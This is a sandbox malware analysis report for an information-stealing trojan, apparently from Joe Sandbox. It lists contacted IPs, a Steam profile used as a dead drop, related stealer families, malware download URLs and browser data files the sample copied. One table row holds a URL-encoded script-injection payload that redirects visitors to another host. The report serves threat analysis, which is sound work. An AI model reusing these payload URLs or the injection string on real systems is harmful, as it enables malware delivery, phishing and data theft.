                                                                                                                                  https://steamcommunity.com/profiles/76561199780418869/inventory/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                                                    		unknown

                                                                                                                                    World Map of Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public IPs

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    49.12.197.9
                                                                                                                                    		unknownGermany
                                                                                                                                    		24940HETZNER-ASDEtrue
                                                                                                                                    104.102.49.254
                                                                                                                                    		steamcommunity.comUnited States
                                                                                                                                    		16625AKAMAI-ASUStrue
                                                                                                                                    147.45.44.104
                                                                                                                                    		unknownRussian Federation
                                                                                                                                    		2895FREE-NET-ASFREEnetEUfalse

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                    Analysis ID:1524654
                                                                                                                                    Start date and time:2024-10-03 03:25:13 +02:00
                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 8m 28s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                    Number of analysed new started processes analysed:11
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Sample name:file.exe
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@5/26@1/3
                                                                                                                                    EGA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    • Number of executed functions: 96
                                                                                                                                    • Number of non-executed functions: 180
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                    Warnings

                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    21:26:50API Interceptor1x Sleep call for process: aspnet_regiis.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    49.12.197.966fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                    6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                      hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • www.valvesoftware.com/legal.htm
                                                                                                                                                        147.45.44.104nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                                                                                                        • 147.45.44.104/revada/66fa80c468fe3_Channel2.exe
                                                                                                                                                        66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                                                                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                        • 147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                                                                                                                                                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                        • 147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        steamcommunity.comtcU5sAPsAc.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        Setup.exeGet hashmaliciousLummaC, MicroClipBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        kuly.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        webNY0O9Sr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        klFMCT64RF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        EKAHephXb2.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        webNY0O9Sr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        klFMCT64RF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.102.49.254

                                                                                                                                                        ASNs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        FREE-NET-ASFREEnetEUnJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                                                                                                        • 147.45.60.44
                                                                                                                                                        66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104
                                                                                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104
                                                                                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104
                                                                                                                                                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                        • 147.45.44.104
                                                                                                                                                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                        • 147.45.44.104
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 147.45.44.104
                                                                                                                                                        AKAMAI-ASUSGlobalfoundries.com_Report_46279.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 23.217.172.185
                                                                                                                                                        cleu.cmDGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 23.47.168.24
                                                                                                                                                        kUiqbpzmbo.exeGet hashmaliciousXWormBrowse
                                                                                                                                                        • 92.122.18.57
                                                                                                                                                        Play_VM-NowCWhiteAudiowav012.htmlGet hashmaliciousTycoon2FABrowse
                                                                                                                                                        • 2.19.224.93
                                                                                                                                                        tcU5sAPsAc.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        deveba=.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 173.223.116.167
                                                                                                                                                        Proposal From Transom.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                        • 23.203.104.175
                                                                                                                                                        Payout_receipt.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 96.17.64.189
                                                                                                                                                        Visix Digital Signage.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 23.203.104.175
                                                                                                                                                        novo.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                        • 184.28.163.53
                                                                                                                                                        HETZNER-ASDEMZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                                                                                                                                                        • 195.201.57.90
                                                                                                                                                        N5mRSBWm8P.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                        • 195.201.57.90
                                                                                                                                                        https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                                                                                                                                                        • 5.161.250.225
                                                                                                                                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 197.242.86.248
                                                                                                                                                        ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 197.242.86.252
                                                                                                                                                        novo.mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                        • 5.75.175.36
                                                                                                                                                        novo.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                        • 116.203.33.160
                                                                                                                                                        yakov.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 78.47.94.116
                                                                                                                                                        66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                        • 49.12.197.9
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 49.12.197.9

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        51c64c77e60f3980eea90869b68c58a866fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                        • 49.12.197.9
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 49.12.197.9
                                                                                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                        • 49.12.197.9
                                                                                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                        • 49.12.197.9
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 49.12.197.9
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 49.12.197.9
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 49.12.197.9
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 49.12.197.9
                                                                                                                                                        6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 49.12.197.9
                                                                                                                                                        hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 49.12.197.9
                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19MZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        C5Nbn7P6GJ.exeGet hashmaliciousXRed, XWormBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        lFsYXvJPWw.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        563299efce875400a8d9b44b96597c8e-sample (1).zipGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                                                                                                        • 104.102.49.254
                                                                                                                                                        AMG Cargo Logistic.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.102.49.254

                                                                                                                                                        Dropped Files

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                            nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse

                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                            C:\ProgramData\CAAAAFBKFI.exe

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:modified
                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                            Entropy (8bit):2.8150724101159437
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:+MEM:+BM
                                                                                                                                                                            MD5:AEE9784C03B80D38D3271CDE2B252B8D
                                                                                                                                                                            SHA1:E5FD9AA24C9417E7332E6F25936AE2A6EC8F1524
                                                                                                                                                                            SHA-256:27C2CCD962C2B8DCCB52FE3688AB236F186F7A41FD57D810478712048E9AD3F8
                                                                                                                                                                            SHA-512:A83C2F678A77228F5C7F2FB61A723217892B8422913739D1C65CB97701C341361EEEE617E9D050A86B552DB4DD87B18CFB94443977A75A5862171346609E9472
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Preview:Unknown error

                                                                                                                                                                            C:\ProgramData\IDHIIJJJKEGI\BGIIEG

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):106496
                                                                                                                                                                            Entropy (8bit):1.1371207751183456
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
                                                                                                                                                                            MD5:643AC1E34BE0FDE5FA0CD279E476DF3A
                                                                                                                                                                            SHA1:241B9EA323D640B82E8085803CBE3F61FEEA458F
                                                                                                                                                                            SHA-256:C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
                                                                                                                                                                            SHA-512:73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\IDHIIJJJKEGI\CBGCBK

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):159744
                                                                                                                                                                            Entropy (8bit):0.5394293526345721
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                            MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                            SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                            SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                            SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                            Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\IDHIIJJJKEGI\CBKJEG

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\IDHIIJJJKEGI\CFBFHI

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):196608
                                                                                                                                                                            Entropy (8bit):1.1221538113908904
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                                                                                                                                            MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                                                                                                                                            SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                                                                                                                                            SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                                                                                                                                            SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\IDHIIJJJKEGI\DBFIEH

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9526
                                                                                                                                                                            Entropy (8bit):5.515924904533179
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:efniR4oYbBp6Sp0pUhUxaXd6Y4nysZM2WklbBNBw8DUSl:hejGpCUvY4ysn7tpwx0
                                                                                                                                                                            MD5:4580799F1DC5720A7EC1766400E98740
                                                                                                                                                                            SHA1:92FD30F47EC545245B934EA492B3C64D5E609AA9
                                                                                                                                                                            SHA-256:57F457D69933E9E8A98C32A05EEE96171419977D45AFFA674A9761556656B9FA
                                                                                                                                                                            SHA-512:C0787F6584D1D26EBFD5AE59F32046CF1FF5AD1BEB1443F2FE93EB89EFA2F216CBC98E101BA3E38A2837ED9411A9DE1370E29ED96E83D8096547E53FEE964567
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "d3d72102-142d-47cc-a7b7-5b20541f2540");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696496527);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696496528);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                            C:\ProgramData\IDHIIJJJKEGI\DHJDAK

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):155648
                                                                                                                                                                            Entropy (8bit):0.5407252242845243
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                            MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                            SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                            SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                            SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\ProgramData\IDHIIJJJKEGI\EHIJDH

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
